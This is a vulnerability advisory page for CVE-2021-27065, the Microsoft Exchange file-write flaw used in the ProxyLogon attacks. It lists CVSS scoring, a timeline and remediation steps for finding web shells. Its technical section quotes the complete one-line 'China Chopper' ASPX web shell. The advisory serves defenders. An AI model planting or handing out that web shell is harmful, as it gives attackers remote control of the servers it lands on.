CVE-2021-27065

HIGH
2021-03-03 [email protected]
7.8
CVSS 3.1
Share

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector
Local
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

5
Analysis Generated
Mar 26, 2026 - 11:19 vuln.today
Added to CISA KEV
Dec 18, 2025 - 02:00 cisa
CISA KEV
PoC Detected
Dec 18, 2025 - 02:00 vuln.today
Public exploit code
Patch Released
Dec 18, 2025 - 02:00 nvd
Patch available
CVE Published
Mar 03, 2021 - 00:15 nvd
HIGH 7.8

Description

Microsoft Exchange Server Remote Code Execution Vulnerability

Analysis

Microsoft Exchange Server allows post-authentication arbitrary file write that enables web shell deployment, the primary persistence mechanism in the ProxyLogon attack chain responsible for compromising 250,000+ servers.

Technical Context

The CWE-22 path traversal in Exchange's file handling allows writing arbitrary content to paths controlled by the attacker. The exploit writes a one-line ASPX web shell (typically the 'China Chopper' web shell: `<%@Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe")%>`) to the OWA virtual directory.

Affected Products

['Microsoft Exchange Server 2013/2016/2019']

Remediation

Apply patches AND scan for web shells. Check C:\inetpub\wwwroot\aspnet_client\, OWA, and ECP directories for suspicious .aspx files. Run Microsoft's Exchange On-premises Mitigation Tool (EOMT). Review IIS logs for web shell access.

Priority Score

213
Low Medium High Critical
KEV: +50
EPSS: +94.3
CVSS: +39
POC: +20

Share

CVE-2021-27065 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy